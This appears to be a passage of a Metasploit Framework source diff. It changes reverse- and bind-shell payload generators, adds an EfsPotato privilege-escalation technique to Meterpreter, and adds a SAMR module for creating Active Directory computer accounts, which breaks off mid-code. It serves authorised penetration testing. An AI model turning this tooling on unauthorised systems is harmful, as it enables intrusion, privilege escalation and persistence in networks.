||||
def read_from_file(fpath, binary=false)
|
||||
if binary
|
||||
# pg_read_binary_file returns bytea
|
||||
# an encoder might be needed
|
||||
call_function("pg_read_binary_file('#{fpath}')")
|
||||
else
|
||||
call_function("pg_read_file('#{fpath}')")
|
||||
end
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
#
|
||||
|
||||
@@ -59,10 +59,10 @@ class Payload < Msf::Module
|
||||
#
|
||||
self.module_info['Dependencies'] = self.module_info['Dependencies'] || []
|
||||
|
||||
# If this is a staged payload but there is no stage information,
|
||||
# If this is an adapted or staged payload but there is no stage information,
|
||||
# then this is actually a stager + single combination. Set up the
|
||||
# information hash accordingly.
|
||||
if self.class.include?(Msf::Payload::Single) and
|
||||
if (self.class.include?(Msf::Payload::Adapter) || self.class.include?(Msf::Payload::Single)) and
|
||||
self.class.include?(Msf::Payload::Stager)
|
||||
self.module_info['Stage'] = {}
|
||||
|
||||
@@ -288,7 +288,7 @@ class Payload < Msf::Module
|
||||
#
|
||||
# Generates the payload and returns the raw buffer to the caller.
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
internal_generate
|
||||
end
|
||||
|
||||
|
||||
@@ -43,7 +43,7 @@ module Payload::Generic
|
||||
# the actual payload in case settings have changed. Other methods will
|
||||
# use the cached version if possible.
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
reset
|
||||
|
||||
redirect_to_actual(:generate)
|
||||
|
||||
@@ -19,7 +19,7 @@ module Payload::Linux::BindTcp
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
reliable: false
|
||||
|
||||
@@ -18,7 +18,7 @@ module Payload::Linux::ReverseTcp_x86
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
|
||||
@@ -17,7 +17,7 @@ module Payload::Linux::ReverseTcp_x64
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
|
||||
@@ -17,7 +17,7 @@ module Payload::Php::BindTcp
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT']
|
||||
}
|
||||
|
||||
@@ -17,7 +17,7 @@ module Payload::Php::ReverseTcp
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
|
||||
@@ -16,7 +16,7 @@ module Payload::Python::BindTcp
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT']
|
||||
}
|
||||
|
||||
@@ -21,7 +21,7 @@ module Payload::Python::ReverseTcp
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
|
||||
@@ -20,7 +20,7 @@ module Payload::Python::ReverseTcpSsl
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
|
||||
@@ -23,7 +23,7 @@ module Msf::Payload::Single
|
||||
# return the stager. When a stager is not used, generate will return the
|
||||
# single payload
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
# If we're staged, then we call the super to generate the STAGER
|
||||
if staged?
|
||||
super
|
||||
|
||||
@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
name: datastore['PIPENAME'],
|
||||
host: datastore['PIPEHOST'],
|
||||
|
||||
@@ -21,7 +21,7 @@ module Payload::Windows::BindTcp
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
reliable: false
|
||||
|
||||
@@ -17,7 +17,7 @@ module Payload::Windows::BindTcpRc4
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
|
||||
@@ -61,9 +61,9 @@ module Payload::Windows::EncryptedReverseTcp
|
||||
|
||||
src = ''
|
||||
if staged?
|
||||
src = generate_stager(conf)
|
||||
src = generate_stager(conf, opts)
|
||||
else
|
||||
src = generate_c_src(conf)
|
||||
src = generate_c_src(conf, opts)
|
||||
end
|
||||
|
||||
link_script = module_info['DefaultOptions']['LinkerScript']
|
||||
@@ -76,7 +76,7 @@ module Payload::Windows::EncryptedReverseTcp
|
||||
keep_exe: datastore['KeepExe'],
|
||||
show_compile_cmd: datastore['ShowCompileCMD'],
|
||||
f_name: Tempfile.new(staged? ? 'reverse_pic_stager' : 'reverse_pic_stageless').path,
|
||||
arch: self.arch_to_s
|
||||
arch: opts.fetch(:arch, self.arch_to_s)
|
||||
}
|
||||
|
||||
comp_code = get_compiled_shellcode(src, compile_opts)
|
||||
@@ -92,9 +92,9 @@ module Payload::Windows::EncryptedReverseTcp
|
||||
comp_code
|
||||
end
|
||||
|
||||
def initial_code
|
||||
def initial_code(conf, opts = {})
|
||||
src = headers
|
||||
src << align_rsp if self.arch_to_s.eql?('x64')
|
||||
src << align_rsp if opts.fetch(:arch, self.arch_to_s).eql?('x64')
|
||||
|
||||
if staged?
|
||||
src << chacha_func_staged
|
||||
@@ -104,8 +104,8 @@ module Payload::Windows::EncryptedReverseTcp
|
||||
src << exit_proc
|
||||
end
|
||||
|
||||
def generate_stager(conf)
|
||||
src = initial_code
|
||||
def generate_stager(conf, opts = {})
|
||||
src = initial_code(conf, opts)
|
||||
|
||||
if conf[:call_wsastartup]
|
||||
src << init_winsock
|
||||
@@ -115,7 +115,7 @@ module Payload::Windows::EncryptedReverseTcp
|
||||
src << get_load_library(conf[:host], conf[:port])
|
||||
src << call_init_winsock if conf[:call_wsastartup]
|
||||
src << start_comm(conf[:uuid])
|
||||
src << stager_comm
|
||||
src << stager_comm(conf, opts)
|
||||
end
|
||||
|
||||
def sends_hex_uuid?
|
||||
@@ -148,21 +148,21 @@ module Payload::Windows::EncryptedReverseTcp
|
||||
keep_exe: datastore['KeepExe'],
|
||||
show_compile_cmd: datastore['ShowCompileCMD'],
|
||||
f_name: Tempfile.new('reverse_pic_stage').path,
|
||||
arch: self.arch_to_s
|
||||
arch: opts.fetch(:arch, self.arch_to_s)
|
||||
}
|
||||
|
||||
src = initial_code
|
||||
src = initial_code(conf, opts)
|
||||
src << get_new_key
|
||||
src << init_proc
|
||||
src << exec_payload_stage
|
||||
src << exec_payload_stage(conf, opts)
|
||||
shellcode = get_compiled_shellcode(src, comp_opts)
|
||||
|
||||
stage_obj = Rex::Crypto::Chacha20.new(key, iv)
|
||||
stage_obj.chacha20_crypt(shellcode)
|
||||
end
|
||||
|
||||
def generate_c_src(conf)
|
||||
src = initial_code
|
||||
def generate_c_src(conf, opts = {})
|
||||
src = initial_code(conf, opts)
|
||||
|
||||
if conf[:call_wsastartup]
|
||||
src << init_winsock
|
||||
@@ -552,9 +552,10 @@ module Payload::Windows::EncryptedReverseTcp
|
||||
^
|
||||
end
|
||||
|
||||
def stager_comm
|
||||
reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
|
||||
inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
|
||||
def stager_comm(conf, opts = {})
|
||||
arch = opts.fetch(:arch, self.arch_to_s)
|
||||
reg = arch.eql?('x86') ? 'edi' : 'rdi'
|
||||
inst = arch.eql?('x86') ? 'movl' : 'movq'
|
||||
|
||||
%Q^
|
||||
FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
|
||||
@@ -596,9 +597,10 @@ module Payload::Windows::EncryptedReverseTcp
|
||||
^
|
||||
end
|
||||
|
||||
def exec_payload_stage
|
||||
reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
|
||||
inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
|
||||
def exec_payload_stage(conf, opts = {})
|
||||
arch = opts.fetch(:arch, self.arch_to_s)
|
||||
reg = arch.eql?('x86') ? 'edi' : 'rdi'
|
||||
inst = arch.eql?('x86') ? 'movl' : 'movq'
|
||||
|
||||
%Q^
|
||||
void ExecutePayload()
|
||||
|
||||
@@ -57,7 +57,7 @@ module Payload::Windows::Exec
|
||||
#
|
||||
# Constructs the payload
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
return super + command_string + "\x00"
|
||||
end
|
||||
|
||||
|
||||
@@ -53,7 +53,7 @@ module Payload::Windows::Exec_x64
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
return super + command_string + "\x00"
|
||||
end
|
||||
|
||||
|
||||
@@ -57,7 +57,7 @@ module Payload::Windows::LoadLibrary
|
||||
#
|
||||
# Constructs the payload
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
return super + dll_string + "\x00"
|
||||
end
|
||||
|
||||
|
||||
@@ -67,8 +67,9 @@ module Msf
|
||||
module Payload::Windows::PEInject
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_options([
|
||||
OptInjectablePE.new('PE', [ true, 'The local path to the PE file to upload' ], arch: arch.first)
|
||||
OptInjectablePE.new('PE', [ true, 'The local path to the PE file to upload' ], arch: info.fetch('AdaptedArch', arch.first))
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@@ -83,7 +84,7 @@ module Msf
|
||||
# Transmits the reflective PE payload to the remote
|
||||
# computer so that it can be loaded into memory.
|
||||
#
|
||||
def handle_connection(conn, _opts = {})
|
||||
def handle_connection(conn, opts = {})
|
||||
data = ''
|
||||
begin
|
||||
File.open(pe_path, 'rb') do |f|
|
||||
@@ -96,7 +97,7 @@ module Msf
|
||||
end
|
||||
|
||||
print_status('Premapping PE file...')
|
||||
pe_map = create_pe_memory_map(data)
|
||||
pe_map = create_pe_memory_map(data, opts)
|
||||
print_status("Mapped PE size #{pe_map[:bytes].length}")
|
||||
opts = {}
|
||||
opts[:is_dll] = pe_map[:is_dll]
|
||||
@@ -113,10 +114,10 @@ module Msf
|
||||
conn.close
|
||||
end
|
||||
|
||||
def create_pe_memory_map(file)
|
||||
def create_pe_memory_map(file, opts = {})
|
||||
pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(file))
|
||||
begin
|
||||
OptInjectablePE.assert_compatible(pe, arch.first)
|
||||
OptInjectablePE.assert_compatible(pe, opts.fetch(:arch, arch.first))
|
||||
rescue Msf::ValidationError => e
|
||||
print_error("PE validation error: #{e.message}")
|
||||
raise
|
||||
|
||||
@@ -26,7 +26,7 @@ module Payload::Windows::ReverseNamedPipe
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
name: datastore['PIPENAME'],
|
||||
host: datastore['PIPEHOST'] || '.',
|
||||
|
||||
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseTcpDns
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
|
||||
@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
|
||||
@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4Dns
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
|
||||
@@ -16,7 +16,7 @@ module Payload::Windows::ReverseUdp
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
|
||||
@@ -29,7 +29,7 @@ module Payload::Windows::ReverseWinHttps
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
|
||||
@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe_x64
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
name: datastore['PIPENAME'],
|
||||
host: datastore['PIPEHOST'],
|
||||
|
||||
@@ -16,7 +16,7 @@ module Payload::Windows::BindTcpRc4_x64
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
|
||||
@@ -19,7 +19,7 @@ module Payload::Windows::BindTcp_x64
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
reliable: false
|
||||
|
||||
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseNamedPipe_x64
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
name: datastore['PIPENAME'],
|
||||
host: datastore['PIPEHOST'],
|
||||
|
||||
@@ -16,7 +16,7 @@ module Payload::Windows::ReverseTcpRc4_x64
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
|
||||
@@ -26,7 +26,7 @@ module Payload::Windows::ReverseTcp_x64
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
|
||||
@@ -28,7 +28,7 @@ module Payload::Windows::ReverseWinHttps_x64
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
def generate(_opts = {})
|
||||
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
|
||||
@@ -294,6 +294,7 @@ module Services
|
||||
# Mode is a string with either auto, manual or disable for the
|
||||
# corresponding setting. The name of the service is case sensitive.
|
||||
#
|
||||
# @raise [RuntimeError] if an invalid startup mode is provided in the mode parameter
|
||||
#
|
||||
def service_change_startup(name, mode, server=nil)
|
||||
if mode.is_a? Integer
|
||||
@@ -338,6 +339,8 @@ module Services
|
||||
#
|
||||
# @return [GetLastError] 0 if the function succeeds
|
||||
#
|
||||
# @raise [RuntimeError] if OpenSCManagerA failed
|
||||
#
|
||||
def service_change_config(name, opts, server=nil)
|
||||
open_sc_manager(:host=>server, :access=>"SC_MANAGER_CONNECT") do |manager|
|
||||
open_service_handle(manager, name, "SERVICE_CHANGE_CONFIG") do |service_handle|
|
||||
@@ -369,6 +372,8 @@ module Services
|
||||
#
|
||||
# @return [GetLastError] 0 if the function succeeds
|
||||
#
|
||||
# @raise [RuntimeError] if OpenSCManagerA failed
|
||||
#
|
||||
def service_create(name, opts, server=nil)
|
||||
access = "SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE | SC_MANAGER_QUERY_LOCK_STATUS"
|
||||
open_sc_manager(:host=>server, :access=>access) do |manager|
|
||||
@@ -465,6 +470,8 @@ module Services
|
||||
#
|
||||
# @param (see #service_start)
|
||||
#
|
||||
# @raise [RuntimeError] if OpenServiceA failed
|
||||
#
|
||||
def service_delete(name, server=nil)
|
||||
open_sc_manager(:host=>server) do |manager|
|
||||
open_service_handle(manager, name, "DELETE") do |service_handle|
|
||||
@@ -483,7 +490,6 @@ module Services
|
||||
#
|
||||
# @raise (see #service_start)
|
||||
#
|
||||
#
|
||||
def service_status(name, server=nil)
|
||||
ret = nil
|
||||
|
||||
@@ -513,53 +519,41 @@ module Services
|
||||
#
|
||||
# @return [Boolean] indicating success
|
||||
#
|
||||
#
|
||||
def service_restart(name, start_type=START_TYPE_AUTO, server=nil)
|
||||
tried = false
|
||||
def service_restart(name, start_type=START_TYPE_AUTO, server=nil, should_retry=true)
|
||||
status = service_start(name, server)
|
||||
|
||||
begin
|
||||
status = service_start(name, server)
|
||||
if status == Error::SUCCESS
|
||||
vprint_good("[#{name}] Service started")
|
||||
return true
|
||||
end
|
||||
|
||||
if status == Error::SUCCESS
|
||||
vprint_good("[#{name}] Service started")
|
||||
return true
|
||||
else
|
||||
raise status
|
||||
end
|
||||
rescue RuntimeError => s
|
||||
if tried
|
||||
vprint_error("[#{name}] Unhandled error: #{s}")
|
||||
return false
|
||||
else
|
||||
tried = true
|
||||
end
|
||||
|
||||
case s.message.to_i
|
||||
when Error::ACCESS_DENIED
|
||||
vprint_error("[#{name}] Access denied")
|
||||
when Error::INVALID_HANDLE
|
||||
vprint_error("[#{name}] Invalid handle")
|
||||
when Error::PATH_NOT_FOUND
|
||||
vprint_error("[#{name}] Service binary could not be found")
|
||||
when Error::SERVICE_ALREADY_RUNNING
|
||||
vprint_status("[#{name}] Service already running attempting to stop and restart")
|
||||
stopped = service_stop(name, server)
|
||||
if ((stopped == Error::SUCCESS) || (stopped == Error::SERVICE_NOT_ACTIVE))
|
||||
retry
|
||||
else
|
||||
vprint_error("[#{name}] Service disabled, unable to change start type Error: #{stopped}")
|
||||
end
|
||||
when Error::SERVICE_DISABLED
|
||||
vprint_status("[#{name}] Service disabled attempting to set to manual")
|
||||
if (service_change_config(name, {:starttype => start_type}, server) == Error::SUCCESS)
|
||||
retry
|
||||
else
|
||||
vprint_error("[#{name}] Service disabled, unable to change start type")
|
||||
end
|
||||
case status
|
||||
when Error::ACCESS_DENIED
|
||||
vprint_error("[#{name}] Access denied")
|
||||
when Error::INVALID_HANDLE
|
||||
vprint_error("[#{name}] Invalid handle")
|
||||
when Error::PATH_NOT_FOUND
|
||||
vprint_error("[#{name}] Service binary could not be found")
|
||||
when Error::SERVICE_ALREADY_RUNNING
|
||||
vprint_status("[#{name}] Service already running attempting to stop and restart")
|
||||
stopped = service_stop(name, server)
|
||||
if ((stopped == Error::SUCCESS) || (stopped == Error::SERVICE_NOT_ACTIVE))
|
||||
service_restart(name, start_type, server, false) if should_retry
|
||||
else
|
||||
vprint_error("[#{name}] Unhandled error: #{s}")
|
||||
return false
|
||||
vprint_error("[#{name}] Service disabled, unable to change start type Error: #{stopped}")
|
||||
end
|
||||
when Error::SERVICE_DISABLED
|
||||
vprint_status("[#{name}] Service disabled attempting to set to manual")
|
||||
if (service_change_config(name, {:starttype => start_type}, server) == Error::SUCCESS)
|
||||
service_restart(name, start_type, server, false) if should_retry
|
||||
else
|
||||
vprint_error("[#{name}] Service disabled, unable to change start type")
|
||||
end
|
||||
else
|
||||
status = WindowsError::Win32.find_by_retval(s).first
|
||||
vprint_error("[#{name}] Unhandled error: #{status.name}: #{status.description}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
@@ -30,7 +30,8 @@ class Priv < Extension
|
||||
named_pipe_2: 2,
|
||||
token_dup: 3,
|
||||
named_pipe_rpcss: 4,
|
||||
named_pipe_print_spooler: 5
|
||||
named_pipe_print_spooler: 5,
|
||||
named_pipe_efs: 6
|
||||
}.freeze
|
||||
|
||||
#
|
||||
|
||||
@@ -63,15 +63,15 @@ class Process < Rex::Post::Process
|
||||
perms = PROCESS_ALL
|
||||
end
|
||||
|
||||
if (perms & PROCESS_READ)
|
||||
if (perms & PROCESS_READ) > 0
|
||||
real_perms |= PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION
|
||||
end
|
||||
|
||||
if (perms & PROCESS_WRITE)
|
||||
if (perms & PROCESS_WRITE) > 0
|
||||
real_perms |= PROCESS_SET_SESSIONID | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE | PROCESS_SET_QUOTA | PROCESS_SET_INFORMATION
|
||||
end
|
||||
|
||||
if (perms & PROCESS_EXECUTE)
|
||||
if (perms & PROCESS_EXECUTE) > 0
|
||||
real_perms |= PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_CREATE_PROCESS | PROCESS_SUSPEND_RESUME
|
||||
end
|
||||
|
||||
|
||||
@@ -24,6 +24,7 @@ class Console::CommandDispatcher::Priv::Elevate
|
||||
ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
|
||||
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE_RPCSS = 4
|
||||
ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER = 5
|
||||
ELEVATE_TECHNIQUE_NAMEDPIPE_EFS = 6
|
||||
|
||||
ELEVATE_TECHNIQUE_DESCRIPTION =
|
||||
[
|
||||
@@ -32,7 +33,8 @@ class Console::CommandDispatcher::Priv::Elevate
|
||||
'Named Pipe Impersonation (Dropper/Admin)',
|
||||
'Token Duplication (In Memory/Admin)',
|
||||
'Named Pipe Impersonation (RPCSS variant)',
|
||||
'Named Pipe Impersonation (PrintSpooler variant)'
|
||||
'Named Pipe Impersonation (PrintSpooler variant)',
|
||||
'Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)'
|
||||
]
|
||||
|
||||
#
|
||||
|
||||
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
|
||||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '2.0.93'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '2.0.94'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.18'
|
||||
# Needed by msfgui and other rpc components
|
||||
|
||||
@@ -0,0 +1,249 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'ruby_smb/dcerpc/client'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::SMB::Client::Authenticated
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'SAMR Computer Management',
|
||||
'Description' => %q{
|
||||
Add, lookup and delete computer accounts via MS-SAMR. By default
|
||||
standard active directory users can add up to 10 new computers to the
|
||||
domain. Administrative privileges however are required to delete the
|
||||
created accounts.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'JaGoTu', # @jagotu Original Impacket code
|
||||
'Spencer McIntyre',
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py'],
|
||||
],
|
||||
'Notes' => {
|
||||
'Reliability' => [],
|
||||
'Stability' => [],
|
||||
'SideEffects' => [ IOC_IN_LOGS ]
|
||||
},
|
||||
'Actions' => [
|
||||
[ 'ADD_COMPUTER', { 'Description' => 'Add a computer account' } ],
|
||||
[ 'DELETE_COMPUTER', { 'Description' => 'Delete a computer account' } ],
|
||||
[ 'LOOKUP_COMPUTER', { 'Description' => 'Lookup a computer account' } ]
|
||||
],
|
||||
'DefaultAction' => 'ADD_COMPUTER'
|
||||
)
|
||||
)
|
||||
|
||||
register_options([
|
||||
OptString.new('COMPUTER_NAME', [ false, 'The computer name' ]),
|
||||
OptString.new('COMPUTER_PASSWORD', [ false, 'The password for the new computer' ], conditions: %w[ACTION == ADD_COMPUTER]),
|
||||
Opt::RPORT(445)
|
||||
])
|
||||
end
|
||||
|
||||
def connect_samr
|
||||
vprint_status('Connecting to Security Account Manager (SAM) Remote Protocol')
|
||||
samr = @tree.open_file(filename: 'samr', write: true, read: true)
|
||||
|
||||
vprint_status('Binding to \\samr...')
|
||||
samr.bind(endpoint: RubySMB::Dcerpc::Samr)
|
||||
vprint_good('Bound to \\samr')
|
||||
|
||||
samr
|
||||
end
|
||||
|
||||
def run
|
||||
begin
|
||||
connect
|
||||
rescue Rex::ConnectionError => e
|
||||
fail_with(Failure::Unreachable, e.message)
|
||||
end
|
||||
|
||||
begin
|
||||
smb_login
|
||||
rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
|
||||
fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
|
||||
end
|
||||
report_service(
|
||||
host: rhost,
|
||||
port: rport,
|
||||
host_name: simple.client.default_name,
|
||||
proto: 'tcp',
|
||||
name: 'smb',
|
||||
info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
|
||||
)
|
||||
|
||||
begin
|
||||
@tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
|
||||
rescue RubySMB::Error::RubySMBError => e
|
||||
fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
|
||||
end
|
||||
|
||||
begin
|
||||
@samr = connect_samr
|
||||
@server_handle = @samr.samr_connect
|
||||
rescue RubySMB::Dcerpc::Error::FaultError => e
|
||||
elog(e.message, error: e)
|
||||
fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")
|
||||
end
|
||||
|
||||
if datastore['SMBDomain'].blank? || datastore['SMBDomain'] == '.'
|
||||
all_domains = @samr.samr_enumerate_domains_in_sam_server(server_handle: @server_handle).map(&:to_s).map(&:encode)
|
||||
all_domains.delete('Builtin')
|
||||
if all_domains.empty?
|
||||
fail_with(Failure::NotFound, 'No domains were found on the SAM server.')
|
||||
elsif all_domains.length > 1
|
||||
print_status("Enumerated domains: #{all_domains.join(', ')}")
|
||||
fail_with(Failure::BadConfig, 'The SAM server has more than one domain, the target must be specified.')
|
||||
end
|
||||
|
||||
@domain_name = all_domains.first
|
||||
print_status("Using automatically identified domain: #{@domain_name}")
|
||||
else
|
||||
@domain_name = datastore['SMBDomain']
|
||||
end
|
||||
|
||||
@domain_sid = @samr.samr_lookup_domain(server_handle: @server_handle, name: @domain_name)
|
||||
@domain_handle = @samr.samr_open_domain(server_handle: @server_handle, domain_id: @domain_sid)
|
||||
send("action_#{action.name.downcase}")
|
||||
rescue RubySMB::Dcerpc::Error::DcerpcError => e
|
||||
elog(e.message, error: e)
|
||||
fail_with(Failure::UnexpectedReply, e.message)
|
||||
rescue RubySMB::Error::RubySMBError
|
||||
elog(e.message, error: e)
|
||||
fail_with(Failure::Unknown, e.message)
|
||||
end
|
||||
|
||||
def random_hostname(prefix: 'DESKTOP')
|
||||
"#{prefix}-#{Rex::Text.rand_base(8, '', ('A'..'Z').to_a + ('0'..'9').to_a)}$"
|
||||
end
|
||||
|
||||
def action_add_computer
|
||||
if datastore['COMPUTER_NAME'].blank?
|
||||
computer_name = random_hostname
|
||||
4.downto(0) do |attempt|
|
||||
break if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ]).nil?
|
||||
|
||||
computer_name = random_hostname
|
||||
fail_with(Failure::BadConfig, 'Could not find an unused computer name.') if attempt == 0
|
||||
end
|
||||
else
|
||||
computer_name = datastore['COMPUTER_NAME']
|
||||
if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
|
||||
fail_with(Failure::BadConfig, 'The specified computer name already exists.')
|
||||
end
|
||||
end
|
||||
|
||||
result = @samr.samr_create_user2_in_domain(
|
||||
domain_handle: @domain_handle,
|
||||
name: computer_name,
|
||||
account_type: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT,
|
||||
desired_access: RubySMB::Dcerpc::Samr::USER_FORCE_PASSWORD_CHANGE | RubySMB::Dcerpc::Samr::MAXIMUM_ALLOWED
|
||||
)
|
||||
|
||||
user_handle = result[:user_handle]
|
||||
if datastore['COMPUTER_PASSWORD'].blank?
|
||||
password = Rex::Text.rand_text_alphanumeric(32)
|
||||
else
|
||||
password = datastore['COMPUTER_PASSWORD']
|
||||
end
|
||||
|
||||
user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
|
||||
tag: RubySMB::Dcerpc::Samr::USER_INTERNAL4_INFORMATION_NEW,
|
||||
member: RubySMB::Dcerpc::Samr::SamprUserInternal4InformationNew.new(
|
||||
i1: {
|
||||
password_expired: 1,
|
||||
